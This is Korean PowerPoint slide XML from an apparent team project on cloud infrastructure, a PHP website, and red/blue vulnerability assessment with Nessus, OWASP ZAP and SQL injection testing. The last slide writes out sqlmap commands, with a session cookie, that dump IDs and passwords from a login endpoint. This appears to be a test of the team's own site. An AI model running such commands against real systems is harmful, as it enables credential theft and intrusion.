          <p:cNvPr id="58" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8942311" y="4214449"/>
            <a:ext cx="1432612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mazon Ember"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>로그 대시보드</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="211973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1916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CB2E7-4A0F-BF06-3B6F-0B19E84EB4F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1560972" y="1796391"/>
            <a:ext cx="3595250" cy="523220"/>
            <a:chOff x="1560972" y="1767244"/>
            <a:chExt cx="359525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308183-DB54-F711-9B69-C8C5752AF7AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1560972" y="182879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F8E78-68AC-B048-5336-EE835D4169E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2289732" y="1767244"/>
              <a:ext cx="2866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클라우드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2800" spc="-300" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>(CLOUD)?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11023D-9559-0CF8-1B64-CF3A7884D6EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1559867" y="2507200"/>
            <a:ext cx="3394874" cy="523220"/>
            <a:chOff x="1560972" y="2509471"/>
            <a:chExt cx="3394874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3F5BEB-A29E-EC98-4681-67E53CB0B3C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1560972" y="2571026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F1453-BC33-8329-E803-35808F5E93AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2289732" y="2509471"/>
              <a:ext cx="2666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왜 클라우드인가</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2800" spc="-300" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>?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CE44B4-9538-0E64-E3EC-6E698D9B8908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1559867" y="3196156"/>
            <a:ext cx="2598183" cy="523220"/>
            <a:chOff x="1560972" y="3264805"/>
            <a:chExt cx="2598183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FBC02-6717-E326-10F3-EED37C2CE102}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1560972" y="3326360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5A99F0-E26F-49EF-19FA-5DA225DF25D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2289732" y="3264805"/>
              <a:ext cx="1869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인프라 구축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99051F-3F4D-EA41-465F-1520AA5E33FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1558762" y="3934077"/>
            <a:ext cx="4446444" cy="523220"/>
            <a:chOff x="1560972" y="4106486"/>
            <a:chExt cx="4446444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C5CD14-4594-1730-18CF-710701846C6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1560972" y="4168041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4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B9965-4F0D-8E0C-4C5A-019C795529F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2289732" y="4106486"/>
              <a:ext cx="3717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인프라 및 웹 취약점 진단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469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035BBE-B083-9B59-13B7-7C8BE9ABA23F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1571326" y="4689109"/>
            <a:ext cx="4125844" cy="523220"/>
            <a:chOff x="1560972" y="4941742"/>
            <a:chExt cx="4125844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5CD14-4594-1730-18CF-710701846C6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1560972" y="5003297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5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BB9965-4F0D-8E0C-4C5A-019C795529F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2289732" y="4941742"/>
              <a:ext cx="33970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침해 시도 탐지 및 대응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EFE902-5397-F332-924C-C0AEB866EA04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1559867" y="5433815"/>
            <a:ext cx="3239384" cy="523220"/>
            <a:chOff x="1560972" y="5783360"/>
            <a:chExt cx="3239384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5CD14-4594-1730-18CF-710701846C6F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1560972" y="5844915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6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BB9965-4F0D-8E0C-4C5A-019C795529F3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2289732" y="5783360"/>
              <a:ext cx="2510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solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>클라우드의</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2800" spc="-300" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> 미래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85219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웹 페이지 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951831" y="4096357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/>
              <a:t>웹페이지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> 제작 시 사용한 것들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CC48B-E12E-B5CC-0F1A-597E0CFAE2F4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43491-9423-C64B-BA93-E482D0D32313}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="2727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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413416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+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+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2240441" y="5325478"/>
            <a:ext cx="86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HTML</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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6049741" y="532547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CSS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767670" y="5325478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PHP</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2052" name="Picture 4" descr="https://cdn-icons-png.flaticon.com/512/1051/10512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31" y="2228394"/>
            <a:ext cx="2155567" cy="21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cons-png.flaticon.com/512/732/7321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66" y="2228394"/>
            <a:ext cx="2155567" cy="215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-icons-png.flaticon.com/512/919/91983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86" y="2228394"/>
            <a:ext cx="2153291" cy="21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9C463-BAA5-DC46-2D6C-E3456D5C55E8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B0E20-DE46-753C-52C4-523917797AFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="27271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사용한 언어</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="129134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8" y="947999"/>
            <a:ext cx="10273360" cy="5236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98" y="947999"/>
            <a:ext cx="10354459" cy="5236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98" y="947999"/>
            <a:ext cx="10278556" cy="52365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95" y="947999"/>
            <a:ext cx="10349263" cy="52231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9" y="947998"/>
            <a:ext cx="10354459" cy="5241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13" y="942607"/>
            <a:ext cx="10310600" cy="52419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16" y="942606"/>
            <a:ext cx="10315797" cy="52580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88" y="942604"/>
            <a:ext cx="10337227" cy="52419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68" y="942603"/>
            <a:ext cx="10359730" cy="5241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1419F-145D-A1AA-7A9D-2ACC97721177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86B85-15F9-44C5-FC00-5C215CCDF339}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716"/>
            <a:ext cx="369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인프라 구축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-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웹 페이지 제작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64068" y="1485900"/>
            <a:ext cx="1987063" cy="202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g1839216f502_6_103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Google Shape;489;g1839216f502_6_103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1" name="Google Shape;491;g1839216f502_6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75" y="1339138"/>
            <a:ext cx="7633995" cy="53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839216f502_6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250" y="1339150"/>
            <a:ext cx="7899510" cy="530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839216f502_6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200" y="1379075"/>
            <a:ext cx="7495654" cy="5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839216f502_6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650" y="1379075"/>
            <a:ext cx="7444606" cy="52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F79EA-F122-B710-C61E-C2EF8B8357BC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0089-278A-C007-7F8D-3CCB66BE6F9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="272716"/>
            <a:ext cx="369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구축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-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웹 페이지 제작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27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255465" y="872277"/>
            <a:ext cx="6258220" cy="4483771"/>
            <a:chOff x="6817895" y="310803"/>
            <a:chExt cx="569579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514672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6957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인프라 및 웹 취약점 진단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6" y="1156356"/>
            <a:ext cx="2356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Jungle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" b="1" spc="-3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48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6" y="1987353"/>
            <a:ext cx="4637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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ShineMusket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" b="1" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(RED)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6" y="2818350"/>
            <a:ext cx="33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bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ShineMusket</a:t>
            </a:r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(BLUE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4800" b="1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91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인프라 진단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FC77E74-DC0F-F432-7484-461C2CFBA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2" y="1059558"/>
            <a:ext cx="3779741" cy="5414505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39071EE7-E232-E601-5013-D0960C8445F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05" y="1059453"/>
            <a:ext cx="4390909" cy="54144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1570F0BD-D8F5-0E65-1744-347968400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95" y="1059453"/>
            <a:ext cx="4121277" cy="541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F7D394-DBD0-88B5-9946-033A720FA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33" y="1059453"/>
            <a:ext cx="5251561" cy="54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5888883" y="2911443"/>
            <a:ext cx="570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n-ea"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="48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A064BE-3E48-2FCC-4431-3DF63F210E49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1628866" y="1320344"/>
            <a:ext cx="2994024" cy="4699000"/>
            <a:chOff x="1163052" y="1324978"/>
            <a:chExt cx="2994024" cy="469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1163052" y="1324978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677B01-8FB5-8DC6-B676-456D321BD005}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1417717" y="1553578"/>
              <a:ext cx="2514600" cy="35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53C824-937A-E110-963F-5F8649640E2E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2148269" y="5325478"/>
              <a:ext cx="1053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Nessus</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="20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FFA0D6-E012-7832-C3D3-37B2B155E87F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7569111" y="1320344"/>
            <a:ext cx="2994024" cy="4699000"/>
            <a:chOff x="4860673" y="1324978"/>
            <a:chExt cx="2994024" cy="4699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C9E76E-8EE8-7CCC-512E-560C10F30FD6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4860673" y="1324978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0E707E-BE05-865D-DA63-75A73413D84A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5113417" y="1553578"/>
              <a:ext cx="2514600" cy="35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88B951-445B-EE1A-916B-A8BF6CFE58AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5572047" y="5325478"/>
              <a:ext cx="1648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OWASP ZAP</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="20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10D05E-5100-4E45-98CE-875B700A0411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B9852-7803-D399-954D-0DFF833DFEA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163052" y="27271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CC8446-1E62-DA69-C51A-8B0D8715D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55" y="2107744"/>
            <a:ext cx="2438400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BD32A5-F152-0DD9-E96E-5F4340E6DBCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040800" y="2982160"/>
            <a:ext cx="2200060" cy="71128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77DFF79-0AE8-4DA5-BBD6-4DC539378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571" y="3065332"/>
            <a:ext cx="1976613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98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Nessus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871F3E0-E5CA-0B2A-5323-FD5B170D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2" y="1187778"/>
            <a:ext cx="6275422" cy="4482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B2BCB-49A9-A142-E291-B278DA8211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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514832" y="1715692"/>
            <a:ext cx="8532001" cy="342661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A55302-5C6A-D180-5686-9B40A0CB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27" y="838800"/>
            <a:ext cx="4317978" cy="5180400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DE5478B8-30DD-AC95-7B6F-60649447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34" y="838800"/>
            <a:ext cx="3860998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3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03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ZAP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FFCA700-B6F8-58D4-0DE4-60B4C5052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00"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="514832" y="885278"/>
            <a:ext cx="4587344" cy="508744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8748B2E-6175-0798-1DA1-492E06B3A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55" y="892460"/>
            <a:ext cx="6731346" cy="5080261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C2B3240-537D-4621-7907-2667B41AF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03" y="892460"/>
            <a:ext cx="8423229" cy="5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502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ZAP_Report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D12A5F1-11D0-C84E-BA7F-1B3C07E49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2" y="908229"/>
            <a:ext cx="3966982" cy="5225001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34E13FE-9859-AF60-D237-13D58E1E3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45" y="908229"/>
            <a:ext cx="3908510" cy="52236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017617-8D16-800E-240F-4743DDB1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34" y="908229"/>
            <a:ext cx="4207302" cy="52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발표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Infra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RED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633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BLUE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84E10-2A29-D434-1DAE-44B4FBE83AD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6762947" y="4776535"/>
            <a:ext cx="260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accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ShineMusket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="3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</a:rPr>
              <a:t>CERT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34F7F-B06D-5405-B49B-5AB7662BE648}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="608454" y="4791923"/>
            <a:ext cx="3114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</a:rPr>
              <a:t>Jungle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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</a:rPr>
              <a:t>Architect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5261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웹 취약점 진단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F9E0FB-3065-6D11-D9F4-A70250CCAD7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="625642" y="2073656"/>
            <a:ext cx="2578861" cy="3508786"/>
            <a:chOff x="928225" y="2036556"/>
            <a:chExt cx="2041451" cy="350878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0A2222-1861-0C93-F3FF-B480F0A8C532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86559F-3837-B749-A77F-EE960F0146CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="928225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 창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94874F-1BE8-AC63-7149-E86EEE87AE19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4806568" y="2073654"/>
            <a:ext cx="2578861" cy="3508786"/>
            <a:chOff x="928225" y="2036556"/>
            <a:chExt cx="2041451" cy="35087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4EA800-CB42-2FC4-F8F0-05D3A9AD2B37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E28F76-5F8A-6AEE-5FF8-4C4A4B9ADF8E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="928225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글 작성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B7BCD8-8543-D062-B1EF-7934B5EEE8BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8987497" y="2073654"/>
            <a:ext cx="2578861" cy="3508786"/>
            <a:chOff x="928225" y="2036556"/>
            <a:chExt cx="2041451" cy="35087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5830C8-2EFD-13A9-329C-D41B5D0A334C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9F82BB-54EE-0789-515C-7E95BCE571FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="928225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파일 업로드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74B0B8D-DBAC-B388-46FF-4EA8C7A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4" y="2680177"/>
            <a:ext cx="2469015" cy="29425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A76AB20-103D-AE6C-5018-884164B1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68" y="3412549"/>
            <a:ext cx="2578862" cy="13508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1F26344-D611-CA38-C0D5-27CBFB5A3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97" y="3237067"/>
            <a:ext cx="2578861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5BDAAB-0AF2-FB1D-2388-1389233B01A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7811763" y="1499316"/>
            <a:ext cx="82962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게시판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1F53B2-C069-9997-7CE8-8482FAAE8DD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111875" y="1683982"/>
            <a:ext cx="16998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E6D37F-2FDB-0BF5-F00E-906CC72F9BD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6095998" y="1665288"/>
            <a:ext cx="1" cy="408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A5B0213-0B7E-737D-FFE5-73191521D48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641385" y="1683982"/>
            <a:ext cx="1728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2D6B7B2-ECB0-9C49-37AB-F3F8B930DF5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10357148" y="1665288"/>
            <a:ext cx="1" cy="408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32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82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298451" y="21515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인젝션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63349" y="3152141"/>
            <a:ext cx="17401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공격 쿼리 활용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/>
              <a:t>학생</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>교직원 인증 우회</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>및 로그인 가능 여부 확인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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 활용한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데이터 탈취 가능 여부 확인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2AB620-DD34-7B2E-3C2B-4BF8BDE5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37" y="2101139"/>
            <a:ext cx="2416427" cy="32173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C131E6-884D-4873-3B87-C49CC394D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3" y="2095079"/>
            <a:ext cx="2365733" cy="3201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EFC673-E0AF-E7FB-4048-B4889F569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9715" y="2108894"/>
            <a:ext cx="2844498" cy="3201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E9028F-EACD-B233-6441-B8E32989B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5117" y="2111676"/>
            <a:ext cx="2164829" cy="16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871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(SQL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인젝션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86377DE-23F2-618A-BE54-5F3A9A6E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1" y="1004560"/>
            <a:ext cx="3471649" cy="5097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34EF8-FAAB-AD11-9FA4-E3032EF76F66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4487185" y="1720840"/>
            <a:ext cx="75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장비 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>OUT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -u "http://3.39.2.188/member/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>login_proc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>--cookie="PHPSESSID=cgcbc4alln7qs9e6ka20bu67n2" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>--data "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>stud_prof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>stud&amp;id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>kcw&amp;pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ckw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-p "id" -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>eclass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>  -T </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>prof_mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>call_num,id,pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> –dump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장비 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>IN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -u "http://d3icq5s3w8ql3n.cloudfront.net/member/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>login_proc.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>--cookie="PHPSESSID=cgcbc4alln7qs9e6ka20bu67n2" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>--data "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>stud_prof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>stud&amp;id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>kcw&amp;pw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ckw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
